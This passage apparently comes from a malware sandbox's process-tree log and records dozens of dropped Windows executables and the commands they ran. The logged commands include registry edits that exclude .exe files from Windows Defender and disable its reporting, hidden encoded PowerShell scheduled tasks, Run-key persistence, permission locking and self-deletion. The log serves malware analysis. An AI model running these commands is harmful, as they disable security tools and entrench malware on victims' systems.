      PID:8448
- - C:\Users\Admin\AppData\Local\Temp\a\aao.exe
    "C:\Users\Admin\AppData\Local\Temp\a\aao.exe"
    3⤵
    PID:6900
  - - C:\Users\Admin\AppData\Local\Temp\a\aao.exe
      "C:\Users\Admin\AppData\Local\Temp\a\aao.exe"
      4⤵
      PID:8424
- - C:\Users\Admin\AppData\Local\Temp\a\ezy.exe
    "C:\Users\Admin\AppData\Local\Temp\a\ezy.exe"
    3⤵
    PID:2528
  - - C:\Users\Admin\AppData\Local\Temp\a\ezy.exe
      "C:\Users\Admin\AppData\Local\Temp\a\ezy.exe"
      4⤵
      PID:8240
- - C:\Users\Admin\AppData\Local\Temp\a\Tues.....exe
    "C:\Users\Admin\AppData\Local\Temp\a\Tues.....exe"
    3⤵
    PID:1596
- - C:\Users\Admin\AppData\Local\Temp\a\owenzx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\owenzx.exe"
    3⤵
    PID:2560
  - - C:\Users\Admin\AppData\Local\Temp\a\owenzx.exe
      "C:\Users\Admin\AppData\Local\Temp\a\owenzx.exe"
      4⤵
      PID:8756
- - C:\Users\Admin\AppData\Local\Temp\a\newrock.exe
    "C:\Users\Admin\AppData\Local\Temp\a\newrock.exe"
    3⤵
    PID:5476
  - - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
      "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
      4⤵
      PID:5748
    - - C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
        5⤵
        
        PID:7612
  - - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
      "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
      4⤵
      PID:7248
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:8760
    - - C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
        5⤵
        
        PID:10000
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:7296
  - - C:\Users\Admin\AppData\Local\Temp\kos2.exe
      "C:\Users\Admin\AppData\Local\Temp\kos2.exe"
      4⤵
      PID:7364
- - C:\Users\Admin\AppData\Local\Temp\a\RBY2.exe
    "C:\Users\Admin\AppData\Local\Temp\a\RBY2.exe"
    3⤵
    PID:6808
  - - C:\Users\Admin\Pictures\EVkG9cyUe3zNtP9qyiKM8NRJ.exe
      "C:\Users\Admin\Pictures\EVkG9cyUe3zNtP9qyiKM8NRJ.exe"
      4⤵
      PID:7572
    - - C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe"
        5⤵
        
        PID:8332
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
        6⤵
        Creates scheduled task(s)
        
        PID:8716
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "Admin:N"&&CACLS "nhdues.exe" /P "Admin:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "Admin:N"&&CACLS "..\1ff8bec27e" /P "Admin:R" /E&&Exit
        6⤵
        
        PID:8764
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        7⤵
        
        PID:8420
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "nhdues.exe" /P "Admin:N"
        7⤵
        
        PID:6544
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "nhdues.exe" /P "Admin:R" /E
        7⤵
        
        PID:5884
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        7⤵
        
        PID:2924
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\1ff8bec27e" /P "Admin:N"
        7⤵
        
        PID:5076
        
        C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\1ff8bec27e" /P "Admin:R" /E
        7⤵
        
        PID:9056
  - - C:\Users\Admin\Pictures\DYOdseUzkzBjk5yzofSKb92v.exe
      "C:\Users\Admin\Pictures\DYOdseUzkzBjk5yzofSKb92v.exe"
      4⤵
      PID:8184
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:9748
    - - C:\Users\Admin\Pictures\DYOdseUzkzBjk5yzofSKb92v.exe
        
        "C:\Users\Admin\Pictures\DYOdseUzkzBjk5yzofSKb92v.exe"
        5⤵
        
        PID:9552
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:11024
  - - C:\Users\Admin\Pictures\HMit41efKe2FmCfFNCPRuEKq.exe
      "C:\Users\Admin\Pictures\HMit41efKe2FmCfFNCPRuEKq.exe"
      4⤵
      PID:5276
  - - C:\Users\Admin\Pictures\8S4HMZOTTgs8xFpoy41RDa5X.exe
      "C:\Users\Admin\Pictures\8S4HMZOTTgs8xFpoy41RDa5X.exe"
      4⤵
      PID:8188
  - - C:\Users\Admin\Pictures\XtDOEyllw9XLKboDC79vNQ9e.exe
      "C:\Users\Admin\Pictures\XtDOEyllw9XLKboDC79vNQ9e.exe"
      4⤵
      PID:8044
  - - C:\Users\Admin\Pictures\xg3FFi6VSKsnygkDIystTc86.exe
      "C:\Users\Admin\Pictures\xg3FFi6VSKsnygkDIystTc86.exe" --silent --allusers=0
      4⤵
      PID:6140
    - - C:\Users\Admin\Pictures\xg3FFi6VSKsnygkDIystTc86.exe
        
        C:\Users\Admin\Pictures\xg3FFi6VSKsnygkDIystTc86.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.34 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x69548538,0x69548548,0x69548554
        5⤵
        
        PID:6464
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\xg3FFi6VSKsnygkDIystTc86.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\xg3FFi6VSKsnygkDIystTc86.exe" --version
        5⤵
        
        PID:7236
  - - C:\Users\Admin\Pictures\cHrsQ5prQ9EYotvDcGwBspCi.exe
      "C:\Users\Admin\Pictures\cHrsQ5prQ9EYotvDcGwBspCi.exe"
      4⤵
      PID:6788
    - - C:\Users\Admin\AppData\Local\Temp\䑄㕸挸䐴兺㍑硅㑸䙶
        
        "C:\Users\Admin\AppData\Local\Temp\䑄㕸挸䐴兺㍑硅㑸䙶"
        5⤵
        
        PID:5624
  - - C:\Users\Admin\Pictures\D9eFDeviqAMWN9F8c8n6Vdxq.exe
      "C:\Users\Admin\Pictures\D9eFDeviqAMWN9F8c8n6Vdxq.exe"
      4⤵
      PID:6468
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\D9eFDeviqAMWN9F8c8n6Vdxq.exe" & exit
        5⤵
        
        PID:8280
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        6⤵
        Delays execution with timeout.exe
        
        PID:8404
  - - C:\Users\Admin\Pictures\ljyZmTDbKhFiFfPvUKBA3EIe.exe
      "C:\Users\Admin\Pictures\ljyZmTDbKhFiFfPvUKBA3EIe.exe"
      4⤵
      PID:7660
    - - C:\Users\Admin\AppData\Local\Temp\7zS4462.tmp\Install.exe
        
        .\Install.exe
        5⤵
        
        PID:6720
      - C:\Users\Admin\AppData\Local\Temp\7zS4617.tmp\Install.exe
        
        .\Install.exe /embdidylQsC "385121" /S
        6⤵
        
        PID:4384
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        7⤵
        
        PID:7224
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        8⤵
        
        PID:8992
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        9⤵
        
        PID:3988
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        9⤵
        
        PID:6848
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        7⤵
        
        PID:4092
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        8⤵
        
        PID:1232
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        9⤵
        
        PID:7104
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        9⤵
        
        PID:4788
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "geTdoseWj" /SC once /ST 00:00:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        7⤵
        Creates scheduled task(s)
        
        PID:7408
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "geTdoseWj"
        7⤵
        
        PID:7504
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "geTdoseWj"
        7⤵
        
        PID:5940
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 09:15:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\CyZXKNy.exe\" 3Y /SVsite_idajF 385121 /S" /V1 /F
        7⤵
        Creates scheduled task(s)
        
        PID:5380
  - - C:\Users\Admin\Pictures\uTME2HmHWkrPrQioS6gZaoWR.exe
      "C:\Users\Admin\Pictures\uTME2HmHWkrPrQioS6gZaoWR.exe"
      4⤵
      PID:10012
  - - C:\Users\Admin\Pictures\8xl3ACLV0nPwTd0zhMBDqdVp.exe
      "C:\Users\Admin\Pictures\8xl3ACLV0nPwTd0zhMBDqdVp.exe"
      4⤵
      PID:5908
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:9516
    - - C:\Users\Admin\Pictures\8xl3ACLV0nPwTd0zhMBDqdVp.exe
        
        "C:\Users\Admin\Pictures\8xl3ACLV0nPwTd0zhMBDqdVp.exe"
        5⤵
        
        PID:7108
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:6772
  - - C:\Users\Admin\Pictures\RMrkPkcsSFMgeSvXrzKEmqn0.exe
      "C:\Users\Admin\Pictures\RMrkPkcsSFMgeSvXrzKEmqn0.exe"
      4⤵
      PID:9324
  - - C:\Users\Admin\Pictures\syNDe7Pb7GmVMSP4E5BhTChR.exe
      "C:\Users\Admin\Pictures\syNDe7Pb7GmVMSP4E5BhTChR.exe"
      4⤵
      PID:8780
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:4644
    - - C:\Users\Admin\Pictures\syNDe7Pb7GmVMSP4E5BhTChR.exe
        
        "C:\Users\Admin\Pictures\syNDe7Pb7GmVMSP4E5BhTChR.exe"
        5⤵
        
        PID:11036
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:10316
  - - C:\Users\Admin\Pictures\5KxXo3sxaOLGEoyqm7MNsWOc.exe
      "C:\Users\Admin\Pictures\5KxXo3sxaOLGEoyqm7MNsWOc.exe"
      4⤵
      PID:204
  - - C:\Users\Admin\Pictures\6yBmJ0XObP75LscHN4gd4PHz.exe
      "C:\Users\Admin\Pictures\6yBmJ0XObP75LscHN4gd4PHz.exe" --silent --allusers=0
      4⤵
      PID:8056
    - - C:\Users\Admin\Pictures\6yBmJ0XObP75LscHN4gd4PHz.exe
        
        C:\Users\Admin\Pictures\6yBmJ0XObP75LscHN4gd4PHz.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.34 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x67748538,0x67748548,0x67748554
        5⤵
        
        PID:9764
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\6yBmJ0XObP75LscHN4gd4PHz.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\6yBmJ0XObP75LscHN4gd4PHz.exe" --version
        5⤵
        
        PID:10096
  - - C:\Users\Admin\Pictures\dgOqKQ1eEDjmLvdqnGGp59rP.exe
      "C:\Users\Admin\Pictures\dgOqKQ1eEDjmLvdqnGGp59rP.exe"
      4⤵
      PID:5236
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\dgOqKQ1eEDjmLvdqnGGp59rP.exe" & exit
        5⤵
        
        PID:10064
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        6⤵
        Delays execution with timeout.exe
        
        PID:6008
  - - C:\Users\Admin\Pictures\mfYw67GZm1Xj1HEC5CBDdD7E.exe
      "C:\Users\Admin\Pictures\mfYw67GZm1Xj1HEC5CBDdD7E.exe"
      4⤵
      PID:9728
    - - C:\Users\Admin\AppData\Local\Temp\㔴捶湶癆㑮㐸䕗3
        
        "C:\Users\Admin\AppData\Local\Temp\㔴捶湶癆㑮㐸䕗3"
        5⤵
        
        PID:6596
  - - C:\Users\Admin\Pictures\TdiKNDQWa2vzxTUaxyu0HCc0.exe
      "C:\Users\Admin\Pictures\TdiKNDQWa2vzxTUaxyu0HCc0.exe"
      4⤵
      PID:5744
  - - C:\Users\Admin\Pictures\EKG6uMq4FYHqbhynKQKBqz7d.exe
      "C:\Users\Admin\Pictures\EKG6uMq4FYHqbhynKQKBqz7d.exe"
      4⤵
      PID:9028
    - - C:\Users\Admin\AppData\Local\Temp\7zS6BC8.tmp\Install.exe
        
        .\Install.exe
        5⤵
        
        PID:9272
      - C:\Users\Admin\AppData\Local\Temp\7zS7349.tmp\Install.exe
        
        .\Install.exe /embdidylQsC "385121" /S
        6⤵
        
        PID:10504
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        7⤵
        
        PID:8128
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        8⤵
        
        PID:6096
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        9⤵
        
        PID:2792
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        9⤵
        
        PID:9208
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        7⤵
        
        PID:10988
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        8⤵
        
        PID:7292
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        9⤵
        
        PID:2028
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        9⤵
        
        PID:9556
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gLqDtpDUb" /SC once /ST 02:51:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        7⤵
        Creates scheduled task(s)
        
        PID:10512
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gLqDtpDUb"
        7⤵
        
        PID:8368
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gLqDtpDUb"
        7⤵
        
        PID:10532
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 09:22:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\NiOPcJb.exe\" 3Y /fzsite_idSva 385121 /S" /V1 /F
        7⤵
        Creates scheduled task(s)
        
        PID:8796
  - - C:\Users\Admin\Pictures\vW9aBsVQR0NIhuveeDrpLy2l.exe
      "C:\Users\Admin\Pictures\vW9aBsVQR0NIhuveeDrpLy2l.exe"
      4⤵
      PID:6688
  - - C:\Users\Admin\Pictures\0NY1ZwZJxsIj6A7LIxITDP1q.exe
      "C:\Users\Admin\Pictures\0NY1ZwZJxsIj6A7LIxITDP1q.exe"
      4⤵
      PID:6356
  - - C:\Users\Admin\Pictures\MPEeJugsnXmHTEuylAegX2AE.exe
      "C:\Users\Admin\Pictures\MPEeJugsnXmHTEuylAegX2AE.exe"
      4⤵
      PID:6580
  - - C:\Users\Admin\Pictures\PKaU18RGGG9B5v58RY0TekXw.exe
      "C:\Users\Admin\Pictures\PKaU18RGGG9B5v58RY0TekXw.exe"
      4⤵
      PID:11360
  - - C:\Users\Admin\Pictures\QaUaE7NjAvED9Jct6tniIVVs.exe
      "C:\Users\Admin\Pictures\QaUaE7NjAvED9Jct6tniIVVs.exe"
      4⤵
      PID:3060
  - - C:\Users\Admin\Pictures\5kk3fgcvv9Ge3ZuUtSb8JB35.exe
      "C:\Users\Admin\Pictures\5kk3fgcvv9Ge3ZuUtSb8JB35.exe"
      4⤵
      PID:11384
  - - C:\Users\Admin\Pictures\iWji4MR01SO9lrItYFsZjhzY.exe
      "C:\Users\Admin\Pictures\iWji4MR01SO9lrItYFsZjhzY.exe"
      4⤵
      PID:11508
  - - C:\Users\Admin\Pictures\sih6WxmBZqWatFCABpH7LWv1.exe
      "C:\Users\Admin\Pictures\sih6WxmBZqWatFCABpH7LWv1.exe" --silent --allusers=0
      4⤵
      PID:11556
    - - C:\Users\Admin\Pictures\sih6WxmBZqWatFCABpH7LWv1.exe
        
        C:\Users\Admin\Pictures\sih6WxmBZqWatFCABpH7LWv1.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.34 --initial-client-data=0x2b8,0x2bc,0x2c0,0x294,0x2c4,0x67748538,0x67748548,0x67748554
        5⤵
        
        PID:11784
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\sih6WxmBZqWatFCABpH7LWv1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\sih6WxmBZqWatFCABpH7LWv1.exe" --version
        5⤵
        
        PID:11992
  - - C:\Users\Admin\Pictures\AXXfvENt8YqtWvEiyvSNkAmK.exe
      "C:\Users\Admin\Pictures\AXXfvENt8YqtWvEiyvSNkAmK.exe"
      4⤵
      PID:12012
  - - C:\Users\Admin\Pictures\JluUT2c58S3TXH5gsUMCPbu8.exe
      "C:\Users\Admin\Pictures\JluUT2c58S3TXH5gsUMCPbu8.exe"
      4⤵
      PID:8072
- - C:\Users\Admin\AppData\Local\Temp\a\source2.exe
    "C:\Users\Admin\AppData\Local\Temp\a\source2.exe"
    3⤵
    PID:5088
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      4⤵
      PID:5912
- - C:\Users\Admin\AppData\Local\Temp\a\laplas03.exe
    "C:\Users\Admin\AppData\Local\Temp\a\laplas03.exe"
    3⤵
    PID:5700
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Local\Temp\a\laplas03.exe
      4⤵
      PID:8008
    - - C:\Windows\system32\choice.exe
        
        choice /C Y /N /D Y /T 0
        5⤵
        
        PID:7684
- - C:\Users\Admin\AppData\Local\Temp\a\difficultspecificprores.exe
    "C:\Users\Admin\AppData\Local\Temp\a\difficultspecificprores.exe"
    3⤵
    PID:7472
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd /c difficspec.bat
      4⤵
      PID:7540
  - - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\difficultspecific.exe
      C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\difficultspecific.exe
      4⤵
      PID:6656
    - - C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\callcustomerpro.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\callcustomerpro.exe
        5⤵
        
        PID:4164
      - C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\callcustomer.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP008.TMP\callcustomer.exe
        6⤵
        
        PID:404
- - C:\Users\Admin\AppData\Local\Temp\a\amday.exe
    "C:\Users\Admin\AppData\Local\Temp\a\amday.exe"
    3⤵
    PID:8176
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe"
      4⤵
      PID:2960
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe"
      4⤵
      PID:6596
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe"
      4⤵
      PID:2676
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe"
      4⤵
      PID:7640
- - C:\Users\Admin\AppData\Local\Temp\a\rengad.exe
    "C:\Users\Admin\AppData\Local\Temp\a\rengad.exe"
    3⤵
    PID:7580
- - C:\Users\Admin\AppData\Local\Temp\a\carryspend.exe
    "C:\Users\Admin\AppData\Local\Temp\a\carryspend.exe"
    3⤵
    PID:7752
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\towardlowestpro.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\towardlowestpro.exe
      4⤵
      PID:5488
    - - C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\towardlowest.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\towardlowest.exe
        5⤵
        
        PID:8064
- - C:\Users\Admin\AppData\Local\Temp\a\sufferdemand.exe
    "C:\Users\Admin\AppData\Local\Temp\a\sufferdemand.exe"
    3⤵
    PID:7212
- - C:\Users\Admin\AppData\Local\Temp\a\netTimer.exe
    "C:\Users\Admin\AppData\Local\Temp\a\netTimer.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3624
- - C:\Users\Admin\AppData\Local\Temp\a\1712.exe
    "C:\Users\Admin\AppData\Local\Temp\a\1712.exe"
    3⤵
    PID:4092
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "1712" /t REG_SZ /F /D "C:\Users\Admin\Documents\1712.pif"
      4⤵
      PID:7648
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "1712" /t REG_SZ /F /D "C:\Users\Admin\Documents\1712.pif"
        5⤵
        
        PID:8848
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c Copy "C:\Users\Admin\AppData\Local\Temp\a\1712.exe" "C:\Users\Admin\Documents\1712.pif"
      4⤵
      PID:5316
  - - C:\Users\Admin\AppData\Local\Temp\a\1712.exe
      "C:\Users\Admin\AppData\Local\Temp\a\1712.exe"
      4⤵
      PID:4908
  - - C:\Users\Admin\AppData\Local\Temp\a\1712.exe
      "C:\Users\Admin\AppData\Local\Temp\a\1712.exe"
      4⤵
      PID:7844
- - C:\Users\Admin\AppData\Local\Temp\a\kung.exe
    "C:\Users\Admin\AppData\Local\Temp\a\kung.exe"
    3⤵
    PID:6748
  - - C:\Users\Admin\AppData\Local\Temp\a\kung.exe
      "C:\Users\Admin\AppData\Local\Temp\a\kung.exe"
      4⤵
      PID:4776
- - C:\Users\Admin\AppData\Local\Temp\a\win.exe
    "C:\Users\Admin\AppData\Local\Temp\a\win.exe"
    3⤵
    PID:8004
- - C:\Users\Admin\AppData\Local\Temp\a\Kriwgshughb.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Kriwgshughb.exe"
    3⤵
    PID:6788
